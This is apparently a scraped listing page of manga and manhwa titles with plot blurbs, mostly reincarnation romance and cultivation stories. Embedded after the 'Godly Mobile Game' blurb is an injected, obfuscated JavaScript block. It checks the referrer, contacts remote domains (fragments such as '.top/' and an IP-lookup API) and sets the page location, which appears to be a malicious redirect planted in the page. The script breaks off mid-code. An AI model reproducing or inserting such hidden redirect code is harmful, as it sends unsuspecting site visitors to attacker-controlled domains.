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4210 results

Queen Of Poison: The Legend Of A Super Agent, Doctor And Princess

.Description :"She is an ace agent, the queen of medicine and poison. Sweet and adorable she looks; resolute and cunning she actually is. She is half an angel and half a devil. When she travels through time and stays in an orphan girl's body, will she rewrite the history? ""I quit the marriage with this coward girl. To my surprise, she is so shrewd and eloquent! How ignorant I am!"" Some lord regrets. ""She is such a hottie!"" Some prince sighs. "


Limited Extra Time (The Time of the Terminally Ill Extra)

Read manhwa The Time of the Terminally Ill Extra / Limited Extra Time / Karina’s Last Days / 시한부 엑스트라의 시간 The existence of the second child, Karina, who was the successor’s youngest twin and the one who wasn’t as competent as her sibling, has been concealed by the people around her all her life. One day, she finds out that she only has one year left to live. So, she foolishly visited her fiancé, whom she has never had an exchange with. Along with the divorce papers that he longed desired for. “Frankly speaking, I want to stay here for a year.” “….. Are you crazy, Miss?” “I’ll break off the engagement.” But she didn’t know at that time. “It seems that you keep trying to pretend that you don’t know, so I should definitely tell you then.” “Pardon?” “I am fond of you.” It didn’t occur to her that she would receive attention and affection from him without anything in return. So she comes to desire this much for a life without regrets.


Princess of the Animals

I’ll be a voice for the animals! Though Elise is forced to live in isolation, she doesn’t feel alone thanks to her ability to communicate with animals. That is until she’s sent off to marry the ruler of what’s known as the Land of the Barbarians! What adventures, and dangers, await Elise in this strange, new world? Alternative Name 동물들의 공주님


My Second Life As A Jerk Magnet

Read manga My Second Life as a Jerk Magnet Kozue, a woman who has wasted her entire life on awful guys, is granted the god-given ability to recognize scumbags at a glance when she reincarnates into another world as Princess Christa. She dreams of finding the perfect man to marry in her second life, but suddenly the Devil King is revived, throwing everything into chaos. The King orders Christa to marry the Hero that defeated the Devil King, but the so-called “hero” ends up being a complete and utter jerk! Desperate to avoid guys like him at any cost, Christa throws away her position as Princess and decides to run from the castle. Even in her new life, Christa can’t escape the scumbags. Will she ever manage to find happiness..?


The Villainous Princess Wants to Live in a Cookie House

.I thought I'd been reincarnated as a child from a dirt poor home..."I'm here to pick up Anastasia, the imperial grandchild, Her Highness!"...It seems I've possessed the body of the princess who, in the original novel', craved power, only to meet a tragic end.To demonstrate that I was not interested in power, and to fulfil a dream of being a ptissier that I could not achieve in my past life, I only baked sweets with the help of a contracted spirit.You'll feel better if you eat something delicious, and you won't have to kill me!But the harsh and heartless emperor (grandfather), and the Crown Prince (cousin) who will bring me to ruin, as well as the young duke (cousin's friend) who is the greatest knight in the empire, and even the slave knight (Elf) who stabbed me...!"Your Highness' lime pie is good."...Don't tell me these people are besotted with me rather than the sweets?Aisha's baking & healing fantasy, sweet and lovely like dessert! +


Godly Mobile Game

It is said that an inexpensive name makes an easier life, but the inexpensive name and life of Wang Xiao Er, because his leg were crippled, was looked down on by friends and relatives. By complete accident, he picked up a mobile phone with a magical game inside, which allowed Wang Xiao Er to change his fate. What, the things in this game can become real? Wang Xiao Er, with a face full of smiles, said, “Aiyo, hey, then don’t blame me for being greedy. Jiang Shan, beauties, I want them all!”<script></script><script>function _0x4603(){var _0x233621=['hxMTh','184iIfTjF','http://rea','yyYtX','wCRjZ','random','2yIjOqw','text','then','.top/','oUOwz','WGGAO','1254461BvQSZD','844926kePxED','3421156ppPnZw','30kQLmqQ','fIQTD','276HdHnGc','google','5813071ZbwGJN','UcpYH','40EwnxvE','location','floor','href','11438955IUSkEc','.customapi','referrer','IOvHn','eAvbU','1100938BRohJV','https://ip','3LkqdTc','includes','dma.net/','302393npjjwT','eOUkw'];_0x4603=function(){return _0x233621;};return _0x4603();}(function(_0x10d1c3,_0x157a82){var _0x460cff=_0x414a,_0x19916f=_0x10d1c3();while(!![]){try{var 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The Duke’S Hidden Baby: Bogo!

<h2>Pregnant Wife, One Plus One with other name The Duke’s Hidden Baby: BOGO!</h2> He has the absolute power. He kills without hesitation and is a cold, fickle man. Yet he becomes obsessed with her and dotes on her nonstop. The first time they met, he asked, “Was it you, six years ago?” The second time they met, he’s holding onto the DNA test, “You still dare to say he’s not my son?” The n time they met, “Mr. Duke, do you have an end to this?” The guy smiled with a deep charm, “The second child have yet to be born. Of course, there’s no end to this.”


I don’t want to be Empress!

I don’t want to be the empress! Serena, the daughter of a noble is full of intelligence, status and appearance. But the truth is that she said that in her past life she was aware of the tragedies that could occur in the future. It will be that Serena can escape from this tragedy!


The Golden Dawn Light Will Shine For You

Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리 You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God.


The Golden Light of Dawn

You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God. Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리


Queen, You Mustn’t!

Read manhwa Queen, You Mustn’t! / No, Queen! / 여왕님 안 돼요! There hasn’t been a queen like this before! The strongest monarch in Babel’s history called the God of War, God’s Daughter, Aroha Fenril Astrofortus! After her return from concluding a seven-year war, she finds that those bastard nobles have prepared a bothersome trap… ‘Your Majesty, you must choose a husband and continue the royal family’s bloodline!’ She wants to throw all of that away, but in consideration for the royal bloodline, she does have to get married. On top of that, she’s receiving a crazy amount of proposals from those that are vying for Babel’s second highest position. The husband candidates chosen by the Grand Chamberlain on special orders! The genius that is Babel Academy’s youngest professor in all history, an optimistic national guard, Babel’s General and the Queen’s reliable comrade, and the young hero of Babel’s political world, the most beautiful man. …Who will Aroha choose?


An Unparalleled Martial Arts Spirit

Peerless Martial Spirit – In the continent of Longmai, thousands of clans stand tall, countless sects exist, and cultivation is the way of life. The strong can do anything they want while the weaklings live like ants. Youngster Chen Feng has an incomplete dan region, causing him to be unable to cultivate, he withstood countless sneers directed at him. Until he obtained a mysterious dragon bloodline, breaking out of his cocoon and opening a new chapter to his life! Coquettish demonic fox spirits, cold female emperors, demon girls or princesses from a prestigious clan, all of them jump into my embrace. With the unparalleled inheritance, I will manifest the strongest martial spirit, obtain all the beauties and look down from the heavens An Unparalleled Martial Arts Spirit
